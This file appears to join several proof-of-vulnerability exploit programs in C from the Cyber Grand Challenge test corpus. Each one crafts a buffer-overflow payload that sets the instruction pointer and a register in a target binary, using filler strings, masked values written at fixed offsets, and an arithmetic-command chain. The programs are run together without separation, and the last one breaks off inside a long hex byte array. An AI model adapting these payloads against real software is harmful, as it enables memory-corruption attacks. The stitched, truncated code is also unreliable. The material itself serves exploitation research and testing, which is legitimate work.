int main(void) { char buf[512]; char msg1[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD\n"; unsigned int ipmask = 0x0EEEEEEE; unsigned int orMask = 0xF1111111; //We use this mask because the cgc_read is delimited // so we will or the requested value with this // to ensure 0x0a doesn't exist unsigned int regmask = 0x0EEEEEEE; unsigned int regnum = 6;//esi type1_vals t1v; type1_negotiate(ipmask, regmask, regnum, &t1v); *((unsigned int*)(msg1 + 132)) = t1v.regval | orMask; *((unsigned int*)(msg1 + 140)) = t1v.ipval | orMask; receive_until(STDIN, (char*)buf, 512, '\n'); transmit_all(STDOUT, msg1, sizeof(buf) - 1); return (0); }
int main(void) { unsigned int i; unsigned char payload[4096], output[4096]; int arg1, arg2; size_t pay_len = 0; type1_vals t1; type1_negotiate(0xfefefefe, 0xfefefefe, 5, &t1); /* Read offset */ length_read(STDIN, output, 2); short rslr = *(short *)output; /* Write n */ i = 42; transmit_all(STDOUT, &i, sizeof(unsigned int)); /* Fill */ memset(payload, 0, sizeof(payload)); for (i = 0; i < 38; ++i) { random(&arg1, sizeof(int), NULL); *(unsigned int *)&payload[pay_len] = CMD_SUB; pay_len += sizeof(unsigned int); *(int *)&payload[pay_len] = arg1 - rslr; pay_len += sizeof(int); *(int *)&payload[pay_len] = arg1; pay_len += sizeof(int); } for (i = 0; i < 3; ++i) { arg1 = t1.regval & 0xFFFF0000; arg2 = t1.regval & 0x0000FFFF; *(unsigned int *)&payload[pay_len] = CMD_ADD; pay_len += sizeof(unsigned int); *(int *)&payload[pay_len] = arg1 - rslr; pay_len += sizeof(int); *(int *)&payload[pay_len] = arg2; pay_len += sizeof(int); } arg1 = t1.ipval & 0xFFFF0000; arg2 = t1.ipval & 0x0000FFFF; *(unsigned int *)&payload[pay_len] = CMD_ADD; pay_len += sizeof(unsigned int); *(int *)&payload[pay_len] = arg1 - rslr; pay_len += sizeof(int); *(int *)&payload[pay_len] = arg2; pay_len += sizeof(int); *(unsigned int *)&payload[pay_len] = CMD_EXP; pay_len += sizeof(unsigned int); *(unsigned int *)&payload[pay_len] = CMD_QUT; pay_len += sizeof(unsigned int); transmit_all(STDOUT, payload, pay_len); length_read(STDIN, output, 1); return 0; }
int main(void) { // negotiate type1_vals t1vals; type1_negotiate(0xEEEEEEEE, 0xEEEEEEEE, 5, &t1vals); // perform POV char input[11]; ReceiveFromCB(input, 9); char bytes[1111] = "POST sender:sender!recipient:+BCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJIIIIHHHH!body:dump 1128775680!subject:subject!\nQUIT\n"; *(int *)(bytes + 1059) = t1vals.regval | 0x11111111; *(int *)(bytes + 1063) = t1vals.ipval | 0x11111111; SendToCB(bytes, sizeof(bytes)); size_t bytes_received; char c; receive(FROM_CB, &c, 1, &bytes_received); return 0; }
int main(void) { programMessageType theMessage; int i; unsigned int checkval; size_t size; type1_vals t1vals; type1_negotiate(0xffffffff, 0xffffffff, 5, &t1vals); // Construct normal message with payload addresses theMessage.flag = 0x5aa5; theMessage.length = CMD_LEN; theMessage.command[0] = 0x11; *( unsigned int * )&(theMessage.command[1]) = t1vals.regval; *( unsigned int * )&(theMessage.command[5]) = t1vals.ipval; for (i=0; i < sizeof(programMessageType)-4; ++i) checkval = checkval + *((unsigned char *)&theMessage+i)*(i+1); theMessage.checkvalue = checkval; // Construct overflow const int len = 1038; unsigned char bad_buff[len]; for( int x = 0; x < len; x++ ) { bad_buff[x] = '\xa5'; } // Send overflow SendToCB( (void*)bad_buff, len ); // Send message with payload SendToCB( (void *)&theMessage, sizeof(programMessageType) ); return 0; }
int main(void) { type1_vals t1vals = { 0 }; uint32_t mask_eip, mask_reg; mask_eip = 0x0FFFFF00; mask_reg = 0x0FFFFF00; type1_negotiate(mask_eip, mask_reg, 2, &t1vals); t1vals.ipval |= 0xF0000000; // make sure out of range of valid fn ptrs t1vals.regval |= 0xF0000000; // make sure out of range of valid fn ptrs do { //*** writing data static unsigned char write_00000_00000[] = "\xd0\xd1\xd2\xd3\x04\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00" "\x00\x00\x00\x00\x88\x13\x00\x00\x01\x00\x00\x00\x7c\x24\x00\x00" "\x02\x00\x00\x00\x03\x26\x00\x00\x03\x00\x00\x00\x5c\x1d\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0f\x00\x00\x00" "\x04\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00" "\x0f\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00" "\x02\x00\x00\x00\x0f\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00" "\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00" "\x0f\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" "\x05\x00\x00\x00\x0f\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00" "\x03\x00\x00\x00\x04\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00" "\x01\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00" "\x05\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00" "\x0f\x00\x00\x00"; static unsigned int write_00000_00000_len = 228; unsigned char *write_00000 = NULL; unsigned int write_00000_len = 0; write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len); if (write_00000_len > 0) { transmit_all(1, write_00000, write_00000_len); } free(write_00000); } while (0); do { unsigned char *read_00000; unsigned int read_00000_len; unsigned int read_00000_ptr = 0; //**** length cgc_read read_00000_len = 4; read_00000 = (unsigned char*)malloc(read_00000_len); int read_00000_res = length_read(0, read_00000, read_00000_len); if (read_00000_res) {} //silence unused variable warning free(read_00000); if (read_00000_ptr) {} //silence unused variable warning if any } while (0); do { //*** writing data static unsigned char write_00001_00000[] = "\x40\x41\x42\x43\xc8\x00\x00\x00\x41\x41\x41\x41\x01\x00\x00\x00" "\x1c\x00\x00\x00\x1f\x1f\x1f\x1f\x42\x41\x41\x41\x00\x00\x00\x00" "\x26\x00\x00\x00\x20\x1f\x1f\x1f\x43\x41\x41\x41\x00\x00\x00\x00" "\x1f\x00\x00\x00\x21\x1f\x1f\x1f\x44\x41\x41\x41\x00\x00\x00\x00" "\x2f\x00\x00\x00\x22\x1f\x1f\x1f\x45\x41\x41\x41\x01\x00\x00\x00" "\x0f\x00\x00\x00\x23\x1f\x1f\x1f\x46\x41\x41\x41\x00\x00\x00\x00" "\x25\x00\x00\x00\x24\x1f\x1f\x1f\x47\x41\x41\x41\x00\x00\x00\x00" "\x20\x00\x00\x00\x25\x1f\x1f\x1f\x48\x41\x41\x41\x00\x00\x00\x00" "\x11\x00\x00\x00\x26\x1f\x1f\x1f\x49\x41\x41\x41\x00\x00\x00\x00" "\x0d\x00\x00\x00\x27\x1f\x1f\x1f\x4a\x41\x41\x41\x01\x00\x00\x00" "\x12\x00\x00\x00\x28\x1f\x1f\x1f\x4b\x41\x41\x41\x00\x00\x00\x00" "\x0e\x00\x00\x00\x29\x1f\x1f\x1f\x4c\x41\x41\x41\x01\x00\x00\x00" "\x15\x00\x00\x00\x2a\x1f\x1f\x1f\x4d\x41\x41\x41\x01\x00\x00\x00" "\x20\x00\x00\x00\x2b\x1f\x1f\x1f\x4e\x41\x41\x41\x00\x00\x00\x00" "\x09\x00\x00\x00\x2c\x1f\x1f\x1f\x4f\x41\x41\x41\x00\x00\x00\x00" "\x07\x00\x00\x00\x2d\x1f\x1f\x1f\x50\x41\x41\x41\x00\x00\x00\x00" "\x2e\x00\x00\x00\x2e\x1f\x1f\x1f\x51\x41\x41\x41\x00\x00\x00\x00" "\x17\x00\x00\x00\x2f\x1f\x1f\x1f\x52\x41\x41\x41\x00\x00\x00\x00" "\x05\x00\x00\x00\x30\x1f\x1f\x1f\x53\x41\x41\x41\x00\x00\x00\x00" "\x22\x00\x00\x00\x31\x1f\x1f\x1f\x54\x41\x41\x41\x01\x00\x00\x00" "\x15\x00\x00\x00\x32\x1f\x1f\x1f\x55\x41\x41\x41\x01\x00\x00\x00" "\x25\x00\x00\x00\x33\x1f\x1f\x1f\x56\x41\x41\x41\x01\x00\x00\x00" "\x0d\x00\x00\x00\x34\x1f\x1f\x1f\x57\x41\x41\x41\x01\x00\x00\x00" "\x10\x00\x00\x00\x35\x1f\x1f\x1f\x58\x41\x41\x41\x01\x00\x00\x00" "\x2b\x00\x00\x00\x36\x1f\x1f\x1f\x59\x41\x41\x41\x01\x00\x00\x00" "\x32\x00\x00\x00\x37\x1f\x1f\x1f\x5a\x41\x41\x41\x01\x00\x00\x00" "\x14\x00\x00\x00\x38\x1f\x1f\x1f\x5b\x41\x41\x41\x01\x00\x00\x00" "\x29\x00\x00\x00\x39\x1f\x1f\x1f\x5c\x41\x41\x41\x00\x00\x00\x00" "\x19\x00\x00\x00\x3a\x1f\x1f\x1f\x5d\x41\x41\x41\x01\x00\x00\x00" "\x0c\x00\x00\x00\x3b\x1f\x1f\x1f\x5e\x41\x41\x41\x01\x00\x00\x00" "\x11\x00\x00\x00\x3c\x1f\x1f\x1f\x5f\x41\x41\x41\x00\x00\x00\x00" "\x25\x00\x00\x00\x3d\x1f\x1f\x1f\x60\x41\x41\x41\x00\x00\x00\x00" "\x12\x00\x00\x00\x3e\x1f\x1f\x1f\x61\x41\x41\x41\x01\x00\x00\x00" "\x11\x00\x00\x00\x3f\x1f\x1f\x1f\x62\x41\x41\x41\x00\x00\x00\x00" "\x14\x00\x00\x00\x40\x1f\x1f\x1f\x63\x41\x41\x41\x01\x00\x00\x00" "\x2b\x00\x00\x00\x41\x1f\x1f\x1f\x64\x41\x41\x41\x01\x00\x00\x00" "\x2b\x00\x00\x00\x42\x1f\x1f\x1f\x65\x41\x41\x41\x01\x00\x00\x00" "\x20\x00\x00\x00\x43\x1f\x1f\x1f\x66\x41\x41\x41\x00\x00\x00\x00" "\x06\x00\x00\x00\x44\x1f\x1f\x1f\x67\x41\x41\x41\x01\x00\x00\x00" "\x2d\x00\x00\x00\x45\x1f\x1f\x1f\x68\x41\x41\x41\x01\x00\x00\x00" "\x1a\x00\x00\x00\x46\x1f\x1f\x1f\x69\x41\x41\x41\x01\x00\x00\x00" "\x0e\x00\x00\x00\x47\x1f\x1f\x1f\x6a\x41\x41\x41\x01\x00\x00\x00" "\x1c\x00\x00\x00\x48\x1f\x1f\x1f\x6b\x41\x41\x41\x01\x00\x00\x00" "\x28\x00\x00\x00\x49\x1f\x1f\x1f\x6c\x41\x41\x41\x01\x00\x00\x00" "\x07\x00\x00\x00\x4a\x1f\x1f\x1f\x6d\x41\x41\x41\x00\x00\x00\x00" "\x08\x00\x00\x00\x4b\x1f\x1f\x1f\x6e\x41\x41\x41\x01\x00\x00\x00" "\x2d\x00\x00\x00\x4c\x1f\x1f\x1f\x6f\x41\x41\x41\x00\x00\x00\x00" "\x21\x00\x00\x00\x4d\x1f\x1f\x1f\x70\x41\x41\x41\x00\x00\x00\x00" "\x1c\x00\x00\x00\x4e\x1f\x1f\x1f\x71\x41\x41\x41\x01\x00\x00\x00" "\x08\x00\x00\x00\x4f\x1f\x1f\x1f\x72\x41\x41\x41\x00\x00\x00\x00" "\x13\x00\x00\x00\x50\x1f\x1f\x1f\x73\x41\x41\x41\x00\x00\x00\x00" "\x0f\x00\x00\x00\x51\x1f\x1f\x1f\x74\x41\x41\x41\x00\x00\x00\x00" "\x0c\x00\x00\x00\x52\x1f\x1f\x1f\x75\x41\x41\x41\x01\x00\x00\x00" "\x25\x00\x00\x00\x53\x1f\x1f\x1f\x76\x41\x41\x41\x00\x00\x00\x00" "\x1e\x00\x00\x00\x54\x1f\x1f\x1f\x77\x41\x41\x41\x01\x00\x00\x00" "\x2c\x00\x00\x00\x55\x1f\x1f\x1f\x78\x41\x41\x41\x00\x00\x00\x00" "\x20\x00\x00\x00\x56\x1f\x1f\x1f\x79\x41\x41\x41\x00\x00\x00\x00" "\x21\x00\x00\x00\x57\x1f\x1f\x1f\x7a\x41\x41\x41\x01\x00\x00\x00" "\x23\x00\x00\x00\x58\x1f\x1f\x1f\x7b\x41\x41\x41\x00\x00\x00\x00" "\x20\x00\x00\x00\x59\x1f\x1f\x1f\x7c\x41\x41\x41\x01\x00\x00\x00" "\x21\x00\x00\x00\x5a\x1f\x1f\x1f\x7d\x41\x41\x41\x01\x00\x00\x00" "\x32\x00\x00\x00\x5b\x1f\x1f\x1f\x7e\x41\x41\x41\x01\x00\x00\x00" "\x25\x00\x00\x00\x5c\x1f\x1f\x1f\x7f\x41\x41\x41\x01\x00\x00\x00" "\x13\x00\x00\x00\x5d\x1f\x1f\x1f\x80\x41\x41\x41\x01\x00\x00\x00" "\x17\x00\x00\x00\x5e\x1f\x1f\x1f\x81\x41\x41\x41\x01\x00\x00\x00" "\x31\x00\x00\x00\x5f\x1f\x1f\x1f\x82\x41\x41\x41\x01\x00\x00\x00" "\x23\x00\x00\x00\x60\x1f\x1f\x1f\x83\x41\x41\x41\x00\x00\x00\x00" "\x1b\x00\x00\x00\x61\x1f\x1f\x1f\x84\x41\x41\x41\x00\x00\x00\x00" "\x11\x00\x00\x00\x62\x1f\x1f\x1f\x85\x41\x41\x41\x01\x00\x00\x00" "\x25\x00\x00\x00\x63\x1f\x1f\x1f\x86\x41\x41\x41\x01\x00\x00\x00" "\x10\x00\x00\x00\x64\x1f\x1f\x1f\x87\x41\x41\x41\x01\x00\x00\x00" "\x0f\x00\x00\x00\x65\x1f\x1f\x1f\x88\x41\x41\x41\x00\x00\x00\x00" "\x09\x00\x00\x00\x66\x1f\x1f\x1f\x89\x41\x41\x41\x01\x00\x00\x00" "\x0f\x00\x00\x00\x67\x1f\x1f\x1f\x8a\x41\x41\x41\x00\x00\x00\x00" "\x23\x00\x00\x00\x68\x1f\x1f\x1f\x8b\x41\x41\x41\x01\x00\x00\x00" "\x19\x00\x00\x00\x69\x1f\x1f\x1f\x8c\x41\x41\x41\x01\x00\x00\x00" "\x0c\x00\x00\x00\x6a\x1f\x1f\x1f\x8d\x41\x41\x41\x01\x00\x00\x00" "\x1f\x00\x00\x00\x6b\x1f\x1f\x1f\x8e\x41\x41\x41\x00\x00\x00\x00" "\x1c\x00\x00\x00\x6c\x1f\x1f\x1f\x8f\x41\x41\x41\x01\x00\x00\x00" "\x2d\x00\x00\x00\x6d\x1f\x1f\x1f\x90\x41\x41\x41\x01\x00\x00\x00" "\x0a\x00\x00\x00\x6e\x1f\x1f\x1f\x91\x41\x41\x41\x00\x00\x00\x00" "\x05\x00\x00\x00\x6f\x1f\x1f\x1f\x92\x41\x41\x41\x01\x00\x00\x00" "\x08\x00\x00\x00\x70\x1f\x1f\x1f\x93\x41\x41\x41\x01\x00\x00\x00" "\x31\x00\x00\x00\x71\x1f\x1f\x1f\x94\x41\x41\x41\x00\x00\x00\x00" "\x12\x00\x00\x00\x72\x1f\x1f\x1f\x95\x41\x41\x41\x00\x00\x00\x00" "\x13\x00\x00\x00\x73\x1f\x1f\x1f\x96\x41\x41\x41\x00\x00\x00\x00" "\x16\x00\x00\x00\x74\x1f\x1f\x1f\x97\x41\x41\x41\x00\x00\x00\x00" "\x22\x00\x00\x00\x75\x1f\x1f\x1f\x98\x41\x41\x41\x00\x00\x00\x00" "\x20\x00\x00\x00\x76\x1f\x1f\x1f\x99\x41\x41\x41\x01\x00\x00\x00" "\x21\x00\x00\x00\x77\x1f\x1f\x1f\x9a\x41\x41\x41\x01\x00\x00\x00" "\x20\x00\x00\x00\x78\x1f\x1f\x1f\x9b\x41\x41\x41\x00\x00\x00\x00" "\x20\x00\x00\x00\x79\x1f\x1f\x1f\x9c\x41\x41\x41\x01\x00\x00\x00" "\x1b\x00\x00\x00\x7a\x1f\x1f\x1f\x9d\x41\x41\x41\x00\x00\x00\x00" "\x1b\x00\x00\x00\x7b\x1f\x1f\x1f\x9e\x41\x41\x41\x00\x00\x00\x00" "\x2f\x00\x00\x00\x7c\x1f\x1f\x1f\x9f\x41\x41\x41\x00\x00\x00\x00" "\x08\x00\x00\x00\x7d\x1f\x1f\x1f\xa0\x41\x41\x41\x01\x00\x00\x00" "\x24\x00\x00\x00\x7e\x1f\x1f\x1f\xa1\x41\x41\x41\x00\x00\x00\x00" "\x13\x00\x00\x00\x7f\x1f\x1f\x1f\xa2\x41\x41\x41\x01\x00\x00\x00" "\x19\x00\x00\x00\x80\x1f\x1f\x1f\xa3\x41\x41\x41\x01\x00\x00\x00" "\x1d\x00\x00\x00\x81\x1f\x1f\x1f\xa4\x41\x41\x41\x01\x00\x00\x00" "\x13\x00\x00\x00\x82\x1f\x1f\x1f\xa5\x41\x41\x41\x00\x00\x00\x00" "\x0d\x00\x00\x00\x83\x1f\x1f\x1f\xa6\x41\x41\x41\x01\x00\x00\x00" "\x21\x00\x00\x00\x84\x1f\x1f\x1f\xa7\x41\x41\x41\x01\x00\x00\x00" "\x2f\x00\x00\x00\x85\x1f\x1f\x1f\xa8\x41\x41\x41\x00\x00\x00\x00" "\x06\x00\x00\x00\x86\x1f\x1f\x1f\xa9\x41\x41\x41\x01\x00\x00\x00" "\x2e\x00\x00\x00\x87\x1f\x1f\x1f\xaa\x41\x41\x41\x01\x00\x00\x00" "\x0b\x00\x00\x00\x88\x1f\x1f\x1f\xab\x41\x41\x41\x01\x00\x00\x00" "\x32\x00\x00\x00\x89\x1f\x1f\x1f\xac\x41\x41\x41\x01\x00\x00\x00" "\x09\x00\x00\x00\x8a\x1f\x1f\x1f\xad\x41\x41\x41\x01\x00\x00\x00" "\x2a\x00\x00\x00\x8b\x1f\x1f\x1f\xae\x41\x41\x41\x01\x00\x00\x00" "\x0d\x00\x00\x00\x8c\x1f\x1f\x1f\xaf\x41\x41\x41\x00\x00\x00\x00" "\x16\x00\x00\x00\x8d\x1f\x1f\x1f\xb0\x41\x41\x41\x00\x00\x00\x00" "\x08\x00\x00\x00\x8e\x1f\x1f\x1f\xb1\x41\x41\x41\x01\x00\x00\x00" "\x08\x00\x00\x00\x8f\x1f\x1f\x1f\xb2\x41\x41\x41\x01\x00\x00\x00" "\x1d\x00\x00\x00\x90\x1f\x1f\x1f\xb3\x41\x41\x41\x01\x00\x00\x00" "\x12\x00\x00\x00\x91\x1f\x1f\x1f\xb4\x41\x41\x41\x00\x00\x00\x00" "\x2f\x00\x00\x00\x92\x1f\x1f\x1f\xb5\x41\x41\x41\x00\x00\x00\x00" "\x0b\x00\x00\x00\x93\x1f\x1f\x1f\xb6\x41\x41\x41\x00\x00\x00\x00" "\x29\x00\x00\x00\x94\x1f\x1f\x1f\xb7\x41\x41\x41\x01\x00\x00\x00" "\x0a\x00\x00\x00\x95\x1f\x1f\x1f\xb8\x41\x41\x41\x00\x00\x00\x00" "\x13\x00\x00\x00\x96\x1f\x1f\x1f\xb9\x41\x41\x41\x00\x00\x00\x00" "\x21\x00\x00\x00\x97\x1f\x1f\x1f\xba\x41\x41\x41\x01\x00\x00\x00" "\x1f\x00\x00\x00\x98\x1f\x1f\x1f\xbb\x41\x41\x41\x00\x00\x00\x00" "\x23\x00\x00\x00\x99\x1f\x1f\x1f\xbc\x41\x41\x41\x00\x00\x00\x00" "\x1c\x00\x00\x00\x9a\x1f\x1f\x1f\xbd\x41\x41\x41\x00\x00\x00\x00" "\x09\x00\x00\x00\x9b\x1f\x1f\x1f\xbe\x41\x41\x41\x00\x00\x00\x00" "\x1a\x00\x00\x00\x9c\x1f\x1f\x1f\xbf\x41\x41\x41\x00\x00\x00\x00" "\x10\x00\x00\x00\x9d\x1f\x1f\x1f\xc0\x41\x41\x41\x00\x00\x00\x00" "\x20\x00\x00\x00\x9e\x1f\x1f\x1f\xc1\x41\x41\x41\x00\x00\x00\x00" "\x1d\x00\x00\x00\x9f\x1f\x1f\x1f\xc2\x41\x41\x41\x00\x00\x00\x00" "\x2c\x00\x00\x00\xa0\x1f\x1f\x1f\xc3\x41\x41\x41\x01\x00\x00\x00" "\x13\x00\x00\x00\xa1\x1f\x1f\x1f\xc4\x41\x41\x41\x00\x00\x00\x00" "\x2e\x00\x00\x00\xa2\x1f\x1f\x1f\xc5\x41\x41\x41\x01\x00\x00\x00" "\x1c\x00\x00\x00\xa3\x1f\x1f\x1f\xc6\x41\x41\x41\x01\x00\x00\x00" "\x0f\x00\x00\x00\xa4\x1f\x1f\x1f\xc7\x41\x41\x41\x01\x00\x00\x00" "\x16\x00\x00\x00\xa5\x1f\x1f\x1f\xc8\x41\x41\x41\x00\x00\x00\x00" "\x0c\x00\x00\x00\xa6\x1f\x1f\x1f\xc9\x41\x41\x41\x01\x00\x00\x00" "\x0f\x00\x00\x00\xa7\x1f\x1f\x1f\xca\x41\x41\x41\x01\x00\x00\x00" "\x13\x00\x00\x00\xa8\x1f\x1f\x1f\xcb\x41\x41\x41\x01\x00\x00\x00" "\x32\x00\x00\x00\xa9\x1f\x1f\x1f\xcc\x41\x41\x41\x01\x00\x00\x00" "\x06\x00\x00\x00\xaa\x1f\x1f\x1f\xcd\x41\x41\x41\x01\x00\x00\x00" "\x18\x00\x00\x00\xab\x1f\x1f\x1f\xce\x41\x41\x41\x00\x00\x00\x00" "\x17\x00\x00\x00\xac\x1f\x1f\x1f\xcf\x41\x41\x41\x01\x00\x00\x00" "\x29\x00\x00\x00\xad\x1f\x1f\x1f\xd0\x41\x41\x41\x00\x00\x00\x00" "\x0c\x00\x00\x00\xae\x1f\x1f\x1f\xd1\x41\x41\x41\x01\x00\x00\x00" "\x2b\x00\x00\x00\xaf\x1f\x1f\x1f\xd2\x41\x41\x41\x01\x00\x00\x00" "\x09\x00\x00\x00\xb0\x1f\x1f\x1f\xd3\x41\x41\x41\x01\x00\x00\x00" "\x0b\x00\x00\x00\xb1\x1f\x1f\x1f\xd4\x41\x41\x41\x00\x00\x00\x00" "\x0f\x00\x00\x00\xb2\x1f\x1f\x1f\xd5\x41\x41\x41\x01\x00\x00\x00" "\x17\x00\x00\x00\xb3\x1f\x1f\x1f\xd6\x41\x41\x41\x01\x00\x00\x00" "\x16\x00\x00\x00\xb4\x1f\x1f\x1f\xd7\x41\x41\x41\x00\x00\x00\x00" "\x0a\x00\x00\x00\xb5\x1f\x1f\x1f\xd8\x41\x41\x41\x01\x00\x00\x00" "\x23\x00\x00\x00\xb6\x1f\x1f\x1f\xd9\x41\x41\x41\x01\x00\x00\x00" "\x0a\x00\x00\x00\xb7\x1f\x1f\x1f\xda\x41\x41\x41\x01\x00\x00\x00" "\x2c\x00\x00\x00\xb8\x1f\x1f\x1f\xdb\x41\x41\x41\x00\x00\x00\x00" "\x24\x00\x00\x00\xb9\x1f\x1f\x1f\xdc\x41\x41\x41\x00\x00\x00\x00" "\x0f\x00\x00\x00\xba\x1f\x1f\x1f\xdd\x41\x41\x41\x00\x00\x00\x00" "\x2a\x00\x00\x00\xbb\x1f\x1f\x1f\xde\x41\x41\x41\x01\x00\x00\x00" "\x1f\x00\x00\x00\xbc\x1f\x1f\x1f\xdf\x41\x41\x41\x00\x00\x00\x00" "\x22\x00\x00\x00\xbd\x1f\x1f\x1f\xe0\x41\x41\x41\x00\x00\x00\x00" "\x27\x00\x00\x00\xbe\x1f\x1f\x1f\xe1\x41\x41\x41\x01\x00\x00\x00" "\x1e\x00\x00\x00\xbf\x1f\x1f\x1f\xe2\x41\x41\x41\x00\x00\x00\x00" "\x12\x00\x00\x00\xc0\x1f\x1f\x1f\xe3\x41\x41\x41\x00\x00\x00\x00" "\x06\x00\x00\x00\xc1\x1f\x1f\x1f\xe4\x41\x41\x41\x00\x00\x00\x00" "\x06\x00\x00\x00\xc2\x1f\x1f\x1f\xe5\x41\x41\x41\x00\x00\x00\x00" "\x20\x00\x00\x00\xc3\x1f\x1f\x1f\xe6\x41\x41\x41\x01\x00\x00\x00" "\x07\x00\x00\x00\xc4\x1f\x1f\x1f\xe7\x41\x41\x41\x01\x00\x00\x00" "\x1d\x00\x00\x00\xc5\x1f\x1f\x1f\xe8\x41\x41\x41\x00\x00\x00\x00" "\x29\x00\x00\x00\xc6\x1f\x1f\x1f\xe9\x41\x41\x41\x01\x00\x00\x00" "\x2f\x00\x00\x00\xc7\x1f\x1f\x1f\xea\x41\x41\x41\x01\x00\x00\x00" "\x2d\x00\x00\x00\xc8\x1f\x1f\x1f\xeb\x41\x41\x41\x01\x00\x00\x00" "\x17\x00\x00\x00\xc9\x1f\x1f\x1f\xec\x41\x41\x41\x00\x00\x00\x00" "\x1d\x00\x00\x00\xca\x1f\x1f\x1f\xed\x41\x41\x41\x01\x00\x00\x00" "\x23\x00\x00\x00\xcb\x1f\x1f\x1f\xee\x41\x41\x41\x00\x00\x00\x00" "\x0e\x00\x00\x00\xcc\x1f\x1f\x1f\xef\x41\x41\x41\x01\x00\x00\x00" "\x06\x00\x00\x00\xcd\x1f\x1f\x1f\xf0\x41\x41\x41\x01\x00\x00\x00" "\x30\x00\x00\x00\xce\x1f\x1f\x1f\xf1\x41\x41\x41\x01\x00\x00\x00" "\x09\x00\x00\x00\xcf\x1f\x1f\x1f\xf2\x41\x41\x41\x00\x00\x00\x00" "\x1d\x00\x00\x00\xd0\x1f\x1f\x1f\xf3\x41\x41\x41\x00\x00\x00\x00" "\x11\x00\x00\x00\xd1\x1f\x1f\x1f\xf4\x41\x41\x41\x01\x00\x00\x00" "\x22\x00\x00\x00\xd2\x1f\x1f\x1f\xf5\x41\x41\x41\x01\x00\x00\x00" "\x1a\x00\x00\x00\xd3\x1f\x1f\x1f\xf6\x41\x41\x41\x01\x00\x00\x00" "\x08\x00\x00\x00\xd4\x1f\x1f\x1f\xf7\x41\x41\x41\x01\x00\x00\x00" "\x27\x00\x00\x00\xd5\x1f\x1f\x1f\xf8\x41\x41\x41\x01\x00\x00\x00" "\x13\x00\x00\x00\xd6\x1f\x1f\x1f\xf9\x41\x41\x41\x01\x00\x00\x00" "\x1b\x00\x00\x00\xd7\x1f\x1f\x1f\xfa\x41\x41\x41\x00\x00\x00\x00" "\x2b\x00\x00\x00\xd8\x1f\x1f\x1f\xfb\x41\x41\x41\x01\x00\x00\x00" "\x17\x00\x00\x00\xd9\x1f\x1f\x1f\xfc\x41\x41\x41\x01\x00\x00\x00" "\x28\x00\x00\x00\xda\x1f\x1f\x1f\xfd\x41\x41\x41\x01\x00\x00\x00" "\x30\x00\x00\x00\xdb\x1f\x1f\x1f\xfe\x41\x41\x41\x00\x00\x00\x00" "\x2b\x00\x00\x00\xdc\x1f\x1f\x1f\xff\x41\x41\x41\x00\x00\x00\x00" "\x11\x00\x00\x00\xdd\x1f\x1f\x1f\x00\x42\x41\x41\x01\x00\x00\x00" "\x22\x00\x00\x00\xde\x1f\x1f\x1f\x01\x42\x41\x41\x01\x00\x00\x00" "\x14\x00\x00\x00\xdf\x1f\x1f\x1f\x02\x42\x41\x41\x01\x00\x00\x00" "\x23\x00\x00\x00\xe0\x1f\x1f\x1f\x03\x42\x41\x41\x01\x00\x00\x00" "\x20\x00\x00\x00\xe1\x1f\x1f\x1f\x04\x42\x41\x41\x01\x00\x00\x00" "\x21\x00\x00\x00\xe2\x1f\x1f\x1f\x05\x42\x41\x41\x00\x00\x00\x00" "\x0a\x00\x00\x00\xe3\x1f\x1f\x1f\x06\x42\x41\x41\x01\x00\x00\x00" 